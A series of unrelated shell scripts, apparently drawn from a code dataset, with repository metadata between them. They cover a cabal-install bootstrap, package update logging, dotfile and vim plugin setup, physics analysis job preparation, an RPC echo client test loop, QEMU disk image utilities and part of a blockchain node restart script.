export PATH=~/.cabal/bin:/opt/cabal/1.22/bin:/opt/ghc/7.10.3/bin:$PATH
wget http://hackage.haskell.org/package/cabal-install-1.24.0.2/cabal-install-1.24.0.2.tar.gz
tar -vzxf cabal-install-1.24.0.2.tar.gz
cd cabal-install-1.24.0.2
./bootstrap.sh
EXTRA_CONFIGURE_OPTS="" ./bootstrap.sh
export PATH=$HOME/.cabal/bin:$PATH
cd ..
rm cabal-install-1.24.0.2.tar.gz
#rm -r cabal-install-1.24.0.2
| true
|
2e2c6c153052e0effee0287c43245d0934d1ba46
|
Shell
|
XiLiXiLiXi/Ansible
|
/Ansible_Linux_Patch/scripts/pre_update.sh
|
UTF-8
| 1,771
| 3.890625
| 4
|
[] |
no_license
|
#!/bin/bash
# @brief actions required to be conducted before updates are applied
# and/or servers are rebooted.
logFile="/tmp/pre_update.log"
###########################
# Begin Functions #
function log_msg {
current_time=$(date "+%Y-%m-%d %H:%M:%S.%3N")
log_level=$1
# all arguments except for the first one, since that is the level
log_msg="${@:2}"
echo "[$current_time] $log_level - $log_msg" >> $logFile
}
function log_error {
log_msg "ERROR" "$@"
}
function log_info {
log_msg "INFO " "$@"
}
function log_debug {
log_msg "DEBUG" "$@"
}
# End Functions #
###########################
###########################
# Begin Body #
#errorCheck=0
#cat /dev/null > $logFile
log_info "========================================================"
log_info "= Pre-update status for $HOSTNAME"
log_info "========================================================"
# Stop app/db
# command to stop app/db
#result=$(ps -ef | grep -i app/db | grep -v grep | wc -l)
#count=0
# if app/db process is still running, PPM has not stopped.
#while [ "$result" != 0 ] && [ $count -lt 9 ]; do
# sleep 20
# result=$(ps -ef | grep -i DNAME | grep -v grep | wc -l)
# count=$((count + 1))
#done
# if app/db hasn't stopped by now, manual intervention/review will be necessary.
#if [ "$result" != 0 ] && [ $count -ge 9 ]; then
# log_error "app/db has NOT stopped"
# errorCheck=1
#else
# log_info "app/db has stopped successfully"
#fi
# Final status of healthchecks
#if [ ${errorCheck} != 0 ]; then
# statusMsg="STATUS: ERROR: Something went wrong. Please review results"
# sed -i "1s/^/$statusMsg\n\n/" $logFile
#else
# statusMsg="STATUS: OK"
# sed -i "1s/^/$statusMsg\n\n/" $logFile
#fi
| true
|
1954599822eb59ad39c84e2a7ead2261784c9ba1
|
Shell
|
shun-fix9/devel-dockerfiles
|
/development-environment-setup
|
UTF-8
| 2,533
| 3.453125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
development_environment_setup_main(){
local root
root=/home/sakai
development_environment_setup_dotfiles
development_environment_setup_plugins
development_environment_setup_vim
development_environment_download_direnv
}
development_environment_setup_dotfiles(){
local dir
local repo
dir=$root
repo=git://github.com/shun-fix9/dotfiles
development_environment_setup_git_sync "."
}
development_environment_setup_plugins(){
local dir
local repo
dir=$root/plugins
mkdir -p $dir
local -a repos=(
git://github.com/shun-fix9/mybashrc
git://github.com/shun-fix9/myprocesses
git://github.com/shun-fix9/findword
git://github.com/sanzen-sekai/mypassword
git://github.com/sanzen-sekai/git-readme
git://github.com/sanzen-sekai/git-pub
git://github.com/sanzen-sekai/git-sub-status
git://github.com/sanzen-sekai/git-post
)
for repo in ${repos[@]}; do
development_environment_setup_git_sync
done
}
development_environment_setup_vim(){
local dir
local repo
local file
dir=$root/.vim/bundle
mkdir -p $dir
local -a repos=(
git://github.com/tpope/vim-pathogen
git://github.com/tpope/vim-fugitive
git://github.com/tpope/vim-endwise
git://github.com/msanders/snipmate.vim
git://github.com/edsono/vim-matchit
git://github.com/plasticboy/vim-markdown
git://github.com/kchmck/vim-coffee-script
git://github.com/cakebaker/scss-syntax.vim
git://github.com/tpope/vim-cucumber
git://github.com/tpope/vim-rails
git://github.com/vim-ruby/vim-ruby
git://github.com/jpo/vim-railscasts-theme.git
)
for repo in ${repos[@]}; do
development_environment_setup_git_sync
done
dir=$root/.vim/autoload
mkdir -p $dir
cd $dir
for file in ../bundle/*/autoload/*; do
if [ -f $file ]; then
if [ ! -L "$(basename $file)" ]; then
ln -s $file
fi
fi
done
}
development_environment_setup_git_sync(){
local name
if [ -n "$1" ]; then
name=$1
else
name=$(basename $repo)
fi
echo "$repo => $dir/$name"
cd $dir
if [ $name = "." ]; then
if [ -d .git ]; then
git pull
else
git clone $repo tmp_git_repo
mv tmp_git_repo/.git .
rm -rf tmp_git_repo
git checkout .
fi
else
if [ -d $name ]; then
cd $name
git pull
else
git clone $repo $name
fi
fi
}
development_environment_download_direnv(){
mkdir -p $root/plugins/direnv/bin
curl -fsSL https://github.com/direnv/direnv/releases/download/v2.8.1/direnv.linux-amd64 > $root/plugins/direnv/bin/direnv
chmod a+x $root/plugins/direnv/bin/direnv
}
development_environment_setup_main
| true
|
4daf644070b57d8687795253ba6ef89bf6b3fe33
|
Shell
|
ksalyer/VBSHWWBabyLooper
|
/scripts/exec_v3.sh
|
UTF-8
| 9,839
| 2.875
| 3
|
[] |
no_license
|
# Help
usage()
{
echo "ERROR - Usage:"
echo
echo " sh $(basename $0) STUDYNAME"
echo
exit
}
if [ -z ${1} ]; then usage; fi
STUDY=${1}
YEARS="2016 2017 2018"
EXECUTABLE=./studies/${STUDY}/doAnalysis
SAMPLES="TTJets_DiLept \
TTJets_SingleLeptFromT \
TTJets_SingleLeptFromTbar \
TTWJetsToLNu \
TTZToLLNuNu_M-10 \
TTZToLL_M-1to10 \
WZTo3LNu \
ZZTo4L \
GluGluHToZZTo4L \
DYJetsToLL_M-50 \
DYJetsToLL_M-10to50 \
WpWpJJ_EWK-QCD \
ttHToNonbb \
ttHTobb \
WJetsToLNu \
tZq_ll_4f_ckm_NLO \
ST_tWll_5f_LO \
TTTT \
TTWH \
TTWW \
TTWZ \
TTZH \
TTZZ \
WWW_4F \
WWZ \
WZG \
WZZ \
ZZZ \
WWToLNuQQ \
ST_s-channel_4f \
ST_t-channel_antitop_4f \
ST_t-channel_top_4f \
ST_tW_antitop_5f \
ST_tW_top_5f \
VBSWmpWmpHToLNuLNu_C2V_6_TuneCP5 \
VBSWmpWmpHToLNuLNu_C2V_3_TuneCP5 \
VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5 \
VBSWmpWmpHToLNuLNu_C2V_m2_TuneCP5 \
VBSWmpWmpHToLNuLNu_TuneCP5 \
DoubleEG_Run2016 \
DoubleMuon_Run2016 \
MuonEG_Run2016 \
SingleElectron_Run2016 \
SingleMuon_Run2016 \
DoubleEG_Run2017 \
DoubleMuon_Run2017 \
MuonEG_Run2017 \
SingleElectron_Run2017 \
SingleMuon_Run2017 \
EGamma_Run2018 \
DoubleMuon_Run2018 \
MuonEG_Run2018 \
SingleMuon_Run2018"
# NANOSKIMDIR=/hadoop/cms/store/user/phchang/VBSHWWNanoSkim/v12/
NANOSKIMDIR=/nfs-7/userdata/phchang/VBSHWWNanoSkim_v12/
rm -f .jobs.txt
for SAMPLE in ${SAMPLES}; do
XSEC=""
for YEAR in ${YEARS}; do
HISTDIR=hists/${STUDY}_${YEAR}
mkdir -p ${HISTDIR}
if [[ ${YEAR} == *"2016"* ]]; then NANOTAG=RunIISummer16NanoAOD*; fi
if [[ ${YEAR} == *"2017"* ]]; then NANOTAG=RunIIFall17NanoAOD*; fi
if [[ ${YEAR} == *"2018"* ]]; then NANOTAG=RunIIAutumn18NanoAOD*; fi
if [[ ${SAMPLE} == *"Run201"* ]]; then NANOTAG=""; fi
if [[ ${SAMPLE} == *"tZq_ll_4f_ckm_NLO"* ]]; then XSEC=0.0758; fi
if [[ ${SAMPLE} == *"ST_s-channel_4f"* ]]; then XSEC=3.74; fi
if [[ ${SAMPLE} == *"ST_t-channel_antitop_4f"* ]]; then XSEC=80.95; fi
if [[ ${SAMPLE} == *"ST_t-channel_top_4f"* ]]; then XSEC=136.02; fi
if [[ ${SAMPLE} == *"ST_tW_antitop_5f"* ]]; then XSEC=19.559; fi
if [[ ${SAMPLE} == *"ST_tW_top_5f"* ]]; then XSEC=19.559; fi
if [[ ${SAMPLE} == *"ST_tWll_5f_LO"* ]]; then XSEC=0.01123; fi
if [[ ${SAMPLE} == *"ZZTo4L"* ]]; then XSEC=1.256; fi
if [[ ${SAMPLE} == *"GluGluHToZZTo4L"* ]]; then XSEC=0.0082323; fi
if [[ ${SAMPLE} == *"DYJetsToLL_M-10to50"* ]]; then XSEC=20657.0; fi
if [[ ${SAMPLE} == *"DYJetsToLL_M-50"* ]]; then XSEC=6198.0; fi
if [[ ${SAMPLE} == *"WJetsToLNu"* ]]; then XSEC=61335.0; fi
if [[ ${SAMPLE} == *"ttHTobb"* ]]; then XSEC=0.1279; fi
if [[ ${SAMPLE} == *"TTWJetsToLNu"* ]]; then XSEC=0.2043; fi
if [[ ${SAMPLE} == *"TTZToLLNuNu_M-10"* ]]; then XSEC=0.2529; fi
if [[ ${SAMPLE} == *"TTZToLL_M-1to10"* ]]; then XSEC=0.2529; fi
if [[ ${SAMPLE} == *"TTJets_DiLept"* ]]; then XSEC=91.044; fi
if [[ ${SAMPLE} == *"TTJets_SingleLeptFromT"* ]]; then XSEC=182.96; fi
if [[ ${SAMPLE} == *"TTJets_SingleLeptFromTbar"* ]]; then XSEC=182.96; fi
if [[ ${SAMPLE} == *"WpWpJJ_EWK"* ]]; then XSEC=0.0539; fi
if [[ ${SAMPLE} == *"WZTo3LNu"* ]]; then XSEC=4.4297; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_TuneCP5"* ]]; then XSEC=0.00001708; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_6_TuneCP5"* ]]; then XSEC=0.00116*137/59.97; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_3_TuneCP5"* ]]; then XSEC=0.000203237376*137/59.97; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5"* ]]; then XSEC=0.0005865984*137/59.97; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_m2_TuneCP5"* ]]; then XSEC=0.000418440192*137/59.97; fi
if [[ ${SAMPLE} == *"ttHToNonbb"* ]]; then XSEC=0.215; fi
if [[ ${SAMPLE} == *"TTTT"* ]]; then XSEC=0.009103; fi
if [[ ${SAMPLE} == *"TTWW"* ]]; then XSEC=0.0115; fi
if [[ ${SAMPLE} == *"TTWZ"* ]]; then XSEC=0.003884; fi
if [[ ${SAMPLE} == *"TTZZ"* ]]; then XSEC=0.001982; fi
if [[ ${SAMPLE} == *"TTWH"* ]]; then XSEC=0.001582; fi
if [[ ${SAMPLE} == *"TTZH"* ]]; then XSEC=0.001535; fi
if [[ ${SAMPLE} == *"WWW_4F"* ]]; then XSEC=0.2086; fi
if [[ ${SAMPLE} == *"WWZ"* ]]; then XSEC=0.1651; fi
if [[ ${SAMPLE} == *"WZG"* ]]; then XSEC=0.04123; fi
if [[ ${SAMPLE} == *"WZZ"* ]]; then XSEC=0.05565; fi
if [[ ${SAMPLE} == *"ZZZ"* ]]; then XSEC=0.01398; fi
if [[ ${SAMPLE} == *"WWToLNuQQ"* ]]; then XSEC=49.997; fi
if [[ ${SAMPLE} == *"Run201"* ]]; then XSEC=1; fi # data
if [[ -z "${XSEC}" ]]; then
echo ${SAMPLE} cross section missing!
echo "here is my guess"
grep ${SAMPLE} NanoTools/NanoCORE/datasetinfo/scale1fbs.txt | awk '{print $1, $5}'
exit
fi
if [[ ${SAMPLE} == *"Run201"* ]]; then
if [[ ${SAMPLE} == *"${YEAR}"* ]]; then
:
else
continue
fi
fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_TuneCP5_2018"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_6_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_6_TuneCP5_2017"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_3_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_3_TuneCP5_2017"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5_2017"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_m2_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_m2_TuneCP5_2017"* ]]; then continue; fi
EXTRATAG=""
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5"* ]]; then EXTRATAG=ext1; fi
# Last bit modification
if [[ ${SAMPLE} == *"Run201"* ]]; then
XSEC=1;
SAMPLEWITHUNDERSCORE=${SAMPLE} # Data does not get the underscore
else
# If it is not data then the SAMPLE string gets a "_" subscript in order to loop over them
SAMPLEWITHUNDERSCORE=${SAMPLE}_
fi
NEVENTSINFOFILE=${NANOSKIMDIR}/${SAMPLEWITHUNDERSCORE}*${NANOTAG}*${EXTRATAG}*/merged/nevents.txt
if [[ ${SAMPLE} == *"Run201"* ]]; then
NTOTALEVENTS=1
NEFFEVENTS=1
SCALE1FB=1
else
NTOTALEVENTS=$(head -n1 ${NEVENTSINFOFILE})
NEFFEVENTS=$(tail -n1 ${NEVENTSINFOFILE})
SCALE1FB=$(echo "${XSEC} / ${NEFFEVENTS} * 1000" | bc -l)
fi
echo ""
echo "=========================================================================================="
echo "Preparing command lines to process ..."
echo "Sample :" ${SAMPLE}
echo "Year :" ${YEAR}
echo "Nano tag :" ${NANOTAG}
echo "N events information file :" ${NEVENTSINFOFILE}
echo "N total events :" ${NTOTALEVENTS}
echo "N eff total events (i.e. pos-neg) :" ${NEFFEVENTS}
echo "Cross section (pb) :" ${XSEC}
echo "Scale1fb :" ${SCALE1FB}
echo ""
#
# More than 1 jobs
#
NJOBS=1
if [[ ${SAMPLE}_${YEAR} == *"ttHToNonbb_2016"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"ttHToNonbb_2017"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"ttHToNonbb_2018"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"TTWJetsToLNu_2016"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"TTWJetsToLNu_2017"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"TTWJetsToLNu_2018"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"WZTo3LNu_2016"* ]]; then NJOBS=1; fi
if [[ ${SAMPLE}_${YEAR} == *"WZTo3LNu_2017"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"WZTo3LNu_2018"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"tZq_ll_4f_ckm_NLO_2016"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"tZq_ll_4f_ckm_NLO_2017"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"tZq_ll_4f_ckm_NLO_2018"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"TTZToLLNuNu_M-10_2016"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"TTZToLLNuNu_M-10_2017"* ]]; then NJOBS=5; fi
if [[ ${SAMPLE}_${YEAR} == *"TTZToLLNuNu_M-10_2018"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"TTTT_2017"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"TTTT_2018"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"ZZTo4L_2016"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"ZZTo4L_2017"* ]]; then NJOBS=20; fi
if [[ ${SAMPLE}_${YEAR} == *"ZZTo4L_2018"* ]]; then NJOBS=20; fi
NJOBSMAXIDX=$((NJOBS - 1))
FILELIST=$(ls ${NANOSKIMDIR}/${SAMPLEWITHUNDERSCORE}*${NANOTAG}*${EXTRATAG}*/merged/output.root | tr '\n' ',')
FILENAME=output
for IJOB in $(seq 0 ${NJOBSMAXIDX}); do
echo "rm -f ${HISTDIR}/${SAMPLE}_${FILENAME}_${IJOB}.root; ${EXECUTABLE} -t Events -o ${HISTDIR}/${SAMPLE}_${FILENAME}_${IJOB}.root --scale1fb ${SCALE1FB} -j ${NJOBS} -I ${IJOB} -i ${FILELIST} > ${HISTDIR}/${SAMPLE}_${FILENAME}_${IJOB}.log 2>&1" >> .jobs.txt
done
done
done
echo "Launching jobs in parallel...."
xargs.sh .jobs.txt
echo "Done!"
| true
|
a7b1792f93f0722f9840fc0ded34a3b639568e35
|
Shell
|
kenferrara/pbis-open
|
/dcerpc/demos/echo_server/echo-tests.sh
|
UTF-8
| 1,634
| 3.453125
| 3
|
[
"Apache-2.0",
"HP-1986",
"OLDAP-2.8",
"BSD-4-Clause-UC",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
if ! /opt/pbis/bin/klist >/dev/null; then
echo "You must use first kinit get credentials in the correct domain."
exit 1
fi
host=$1
if [ -z "$host" ]; then
echo "Specify the host to test against as the first argument"
exit 1
fi
princ=$2
if [ -z "$princ" ]; then
echo "Specify the service principal to use as the second argument"
exit 1
fi
user=$3
password=$4
generate_size=100
calls=100
protocols()
{
echo "$auth over tcp $protection protection$signing"
echo /opt/pbis/tools/echo_client -h "$host" -a "$princ" -t -c$calls -g$generate_size $auth_options $signing_options $protection_options
/opt/pbis/tools/echo_client -h "$host" -a "$princ" -t -c$calls -g$generate_size $auth_options $signing_options $protection_options || exit 2
echo "$auth over named pipe $protection protection$signing"
echo /opt/pbis/tools/echo_client -h "$host" -a "$princ" -n -e '\pipe\echo' -c$calls -g$generate_size $auth_options $signing_options $protection_options
/opt/pbis/tools/echo_client -h "$host" -a "$princ" -n -e '\pipe\echo' -c$calls -g$generate_size $auth_options $signing_options $protection_options || exit 2
}
auth_methods()
{
auth="Negotiate authentication"
auth_options="-S negotiate"
protocols
auth="Kerberos authentication"
auth_options="-S krb5"
protocols
auth="Ntlm authentication"
auth_options="-S ntlm -U $user -P $password"
protocols
}
signing_types()
{
signing=""
signing_options=""
auth_methods
signing=" with header signing"
signing_options="-s"
auth_methods
}
protection="integrity"
protection_options="-p5"
signing_types
protection="privacy"
protection_options="-p6"
signing_types
| true
|
032abbe41f6dcd4de6ea161396e407fb387d673c
|
Shell
|
navidkhoshavi/marss.stt-ram
|
/vmutils.sh
|
UTF-8
| 9,277
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
# Source this file (it won't do anything if you just run it) and then use the
# commands: vmsetup, vmclone, vmmount, vmumount, vmchroot
#
# This file contains a set of commands that make it easier to deal with marss disk images
# I tried to briefly describe what the functions do, but if you need help
# you can send an email to dramninjas (at) gmail (dot) com and I can try
# to explain how to use these.
#
# The gist is that I have 3 raw disk images hda.raw (/root in the VM), hdb.raw (some
# benchmarks like SPEC06 mounted at /root/mnt in the VM), and hdc.raw (containing
# some autorun script at /root/sim/simulate.sh which will be auto run when the
# VM starts). These disk images are copied and the appropriate simulate.sh file is
# loaded into each one when vmsetup is called. vmrun then launches the virtual machine
# and the simulation within the VM begins automatically, allowing one to start up many
# instances at once -- only limited by processors and memory.
#
# The root image needs a bit of work to make this happen (such as autologin as
# root with mingetty) and modifications to /root/.bashrc, but the vmchroot
# command makes it easy to add these without having to actually run the image in QEMU
#adjust these paths to taste
QEMU_IMG_BIN="$HOME/marss.dramsim/qemu/qemu-img"
IMAGE_DIR="$HOME/disks"
MOUNT_POINT="$IMAGE_DIR/mnt"
# referred to from here on out as the "base image"
IMAGE_NAME="parsec.base.raw"
IMAGE_PATH="$IMAGE_DIR/$IMAGE_NAME"
MARSS_DIR=$HOME/marss.dramsim
######################## The actual "public" functions ######################
function vmmount () {
__mount_image $1
__vmpushd $MOUNT_POINT
#TODO: this doesn't always have to be done as root for things like the hdc image ...
sudo su
vmumount
__vmpopd
}
#for symmetry's sake
function vmumount() {
__umount_image
}
# vmclone -- Takes a raw disk image and creates a qcow2 copy of it
# run 'vmclone output.qcow2' to make a copy of the "base image"
# or run 'vmclone someimage.raw output.qcow2' if you want to make a clone of some other image
function vmclone() {
#TODO: maybe use getopt to add a -force flag to override the output file check
if [ "$#" == "2" ] ; then
# try both the filename and to prefix the IMAGE_DIR directory to see if the file exists
if [ -e "$1" ] ; then
local INPUT_FILENAME="$1"
elif [ -e "$IMAGE_DIR/$1" ] ; then
local INPUT_FILENAME="$IMAGE_DIR/$1"
else
echo "Input image $1 not found"
return
fi
if [ -e "$2" ] ; then
echo "Output file $2 already exists"
return
fi
local OUTPUT_FILENAME="$2"
elif [ "$#" == "1" ] ; then
if [ -e "$1" ] ; then
echo "Output file $2 already exists"
return
fi
local INPUT_FILENAME="$IMAGE_PATH"
local OUTPUT_FILENAME="$1"
else
echo "usage: $0 output_filename [input_filename] -- Must at least specify output file ";
return
fi
echo "cloning $INPUT_FILENAME to $OUTPUT_FILENAME..."
$QEMU_IMG_BIN convert -f raw "$INPUT_FILENAME" -O qcow2 "$OUTPUT_FILENAME"
}
# vmrun x -- launch VM #x with the proper parameters for that number
# use 'vmsetup x' before using the vmrun command. Note: the VM will launch
# in a detached screen. Please read up on how to use screen if you are
# not familiar with it, or just remove the call to screen to run as a foreground
# task
function vmrun() {
if [ -z "$1" ] ; then
echo "Specify a number"
return
fi
__vmpushd "$MARSS_DIR"
# sed sure is hard to read ... this just grabs the argument of SIM_DESC= from the simulate file
local SIM_DESCRIPTION=`cat simulate$1.sh | sed -n -e 's/^#SIM_DESC="\([^"]*\)"/\1/p '`
if [ -z "$SIM_DESCRIPTION" ] ; then
echo "No sim description in simulate$1.sh -- did you use vmsetup? (not launching sim)"
__vmpopd
return
fi
if [ ! -f "hda$1.qcow2" ] ; then
echo "ERROR: hda$1.qcow2 not found; can't start VM"
return
fi
local hdb_string=""
if [ -f "hdb$1.qcow2" ] ; then
hdb_string="-hdb hdb$1.qcow2"
fi
local hdc_string=""
if [ -f "hdc$1.raw" ] ; then
hdb_string="-hdc hdc$1.raw"
fi
echo "Launching simulation #$1: $SIM_DESCRIPTION"
local CMD_TO_RUN="SIM_DESC=\"$SIM_DESCRIPTION\" gdb -x gdbrun -args qemu/qemu-system-x86_64 -m 2GB -net nic,model=ne2k_pci -net user -simconfig \"simconfig$1.cfg\" -hda \"hda$1.qcow2\" $hdb_string $hdc_string -curses"
screen -d -m -S "sim$1" bash -c "$CMD_TO_RUN"
__vmpopd
}
function vmclean() {
if [ -z "$1" ] ; then
echo "specify a number"
return
fi
__vmpushd "$MARSS_DIR"
rm hda$1.qcow2 hdb$1.qcow2 hdc$1.raw run$1.stats run$1.log simconfig$1.cfg simulate$1.sh
__vmpopd
}
# vmsetup x [description] [shared|private] [nohdb] -- setup vm x with a sim description
# This command creates the necessary files, copies a simulate.sh file into the hdc disk image which can be auto launched if the VM is setup the right way.
# This function does the heavy lifting of this script -- if it sounds interesting, send dramninjas (at) gmail (dot) com an email and I can explain how
# the disk images are supposed to be set up for this to work right
function vmsetup() {
if [ $# -lt 1 ] ; then
echo "usage: $0 sim_number [sim_description] [shared|private] [nohdb]"
return
fi
local usehdb=1
local cache_config_string=""
if [ "$3" == "shared" ] ; then
cache_config_string="-cache-config-type shared_L2"
fi
if [ "$4" == "nohdb" ] ; then
usehdb=0
fi
__vmpushd "$MARSS_DIR"
#setup the simconfig file
cat > simconfig$1.cfg <<EOF
-stats run$1.stats
-logfile run$1.log
-corefreq 2000000000
$cache_config_string
EOF
local SIMULATE_FILE_SRC="simulate$1.sh"
local SIMULATE_FILE_DEST="$MOUNT_POINT/simulate.sh"
if [ -e "$SIMULATE_FILE_SRC" ] ; then
if [ -z "`grep 'SIM_DESC' $SIMULATE_FILE_SRC`" ] ; then
if [ -z "$2" ] ; then
echo "please provide a sim description"
return
else
echo "#SIM_DESC=\"$2\"" >> $SIMULATE_FILE_SRC
fi
fi
cp "$IMAGE_DIR/hdc.raw" "hdc$1.raw"
__mount_image "hdc$1.raw"
echo "Copying $SIMULATE_FILE_SRC to $SIMULATE_FILE_DEST"
sudo cp "$SIMULATE_FILE_SRC" "$SIMULATE_FILE_DEST"
__umount_image
else
echo "WARNING: using default simulate.sh"
fi
local images_to_clone="hda hdb"
if [ $usehdb == 0 ] ; then
images_to_clone="hda"
fi
for img in $images_to_clone
do
local OUTPUT_IMG_NAME="${img}$1.qcow2"
#FIXME: need to do an lsof first to make sure the image isn't being used by a simulation before trying to do this
# local BASE_IMG_NAME="$IMAGE_DIR/${img}0.qcow2"
# if [ -e "$BASE_IMG_NAME" ] ; then
# echo "copying $BASE_IMG_NAME to $OUTPUT_IMG_NAME"
# cp "$BASE_IMG_NAME" "$OUTPUT_IMG_NAME"
# else
vmclone "$IMAGE_DIR/$img.raw" "$OUTPUT_IMG_NAME"
# fi
done
__vmpopd
}
# vmmultirun x y -- setup and run VMs numbered x to y
function vmmultirun () {
if [ $# -lt 2 ] ; then
echo "usage: $0 start end"
return
fi
for i in `seq $1 $2`
do
vmsetup $i
vmrun $i
done
}
# vmchroot -- mount the base image and chroot into it
# this is useful for mounting the root image and using it
# without having to actually start up QEMU. Things like
# installing packages or compiling
function vmchroot() {
__mount_image $IMAGE_PATH;
__mount_proc_sys_dev;
sudo chroot $MOUNT_POINT
__unmount_proc_sys_dev;
vmumount;
}
################## Utility functions #########################
# so I'm not sure why something like dirname $HOME returns /home when I'd
# expect it to return /home/USER, but I need to make a function that is sane --
# i.e. if the argument is a path to a file, return the directory the file is in,
# but if the directory is already a directory, just return the absolute path to it
function __absdirname() {
if [ -d "$1" ] ; then
echo $(__abspath "$1")
else
echo $(__abspath $(dirname "$1"))
fi
}
function __abspath() {
if [ -d "$1" ] ; then
local DIR=$1
else
local DIR=$(dirname "$1")
fi
__vmpushd $DIR
echo $PWD
__vmpopd
}
function __mount_image () {
local PARTITION_NUM=1
if [ -e "$1" ] ; then # a real filename given
local FILENAME=$( basename "$1" )
local FILE_DIR=$( __absdirname "$1" )
else
local FILENAME="$IMAGE_FILE"
local FILE_DIR="$IMAGE_DIR"
fi
local PARTITION_TYPE="ext2"
echo "Mounting $PARTITION_TYPE partition: image=$FILE_DIR/$FILENAME to $MOUNT_POINT ... "
local OFFSET=`sfdisk -l -uS "$FILE_DIR/$FILENAME" 2> /dev/null | grep "$FILENAME$PARTITION_NUM" | awk '{print $2}'`
local SECTOR_OFFSET=$((OFFSET*512))
sudo mount -t $PARTITION_TYPE -o loop,offset=$SECTOR_OFFSET "$FILE_DIR/$FILENAME" "$MOUNT_POINT"
}
function __umount_image () {
echo -n "unmounting image from $MOUNT_POINT ... "
__vmpushd $HOME
sudo umount "$MOUNT_POINT";
__vmpopd
sync
echo "OK"
}
function __mount_proc_sys_dev () {
sudo mount -o bind /proc "$MOUNT_POINT/proc"
sudo mount -o bind /dev "$MOUNT_POINT/dev"
sudo mount -o bind /sys "$MOUNT_POINT/sys"
sudo mount -o bind /dev/pts "$MOUNT_POINT/dev/pts"
sudo cp /etc/resolv.conf "$MOUNT_POINT/etc/resolv.conf"
}
function __unmount_proc_sys_dev () {
pushd $HOME > /dev/null
sudo umount "$MOUNT_POINT/dev/pts"
sudo umount "$MOUNT_POINT/dev"
sudo umount "$MOUNT_POINT/sys"
sudo umount "$MOUNT_POINT/proc"
popd > /dev/null
}
# get rid of the annoying output of these commands
function __vmpushd() {
pushd "$1" > /dev/null
}
function __vmpopd() {
popd > /dev/null
}
| true
|
b1fbc27db70578a14c50fd85b6ae77a3c74ce111
|
Shell
|
AC9090/wipe-script
|
/make-USB.sh
|
UTF-8
| 369
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# GD Sept 2019
# This script moves other scripts into the working chroot directory, then
# builds that chroot into an initrd and then runs the ISO burn utility
# to build a bootable USB drive
#
cd ~/Documents/wipe-script
sudo ./move_it.sh
cd ramdisk_work
sudo ./build.sh
sudo mintstick -m iso
cd ~/Documents/wipe-script
echo
echo "Build Complete"
echo
exit
| true
|
580c42d057fcba93f0b7dba50b39aa872ed77d5e
|
Shell
|
chain2future-os/future-core-scripts
|
/futureio-tn_bounce.sh
|
UTF-8
| 1,332
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
#
# futureio-tn_bounce is used to restart a node that is acting badly or is down.
# usage: futureio-tn_bounce.sh [arglist]
# arglist will be passed to the node's command line. First with no modifiers
# then with --replay and then a third time with --resync
#
# the data directory and log file are set by this script. Do not pass them on
# the command line.
#
# in most cases, simply running ./futureio-tn_bounce.sh is sufficient.
#
pushd $FUTUREIO_HOME
if [ ! -f programs/nodfuture/nodfuture ]; then
echo unable to locate binary for nodfuture
exit 1
fi
config_base=etc/futureio/node_
if [ -z "$FUTUREIO_NODE" ]; then
DD=`ls -d ${config_base}[012]?`
ddcount=`echo $DD | wc -w`
if [ $ddcount -ne 1 ]; then
echo $HOSTNAME has $ddcount config directories, bounce not possible. Set environment variable
echo FUTUREIO_NODE to the 2-digit node id number to specify which node to bounce. For example:
echo FUTUREIO_NODE=06 $0 \<options\>
cd -
exit 1
fi
OFS=$((${#DD}-2))
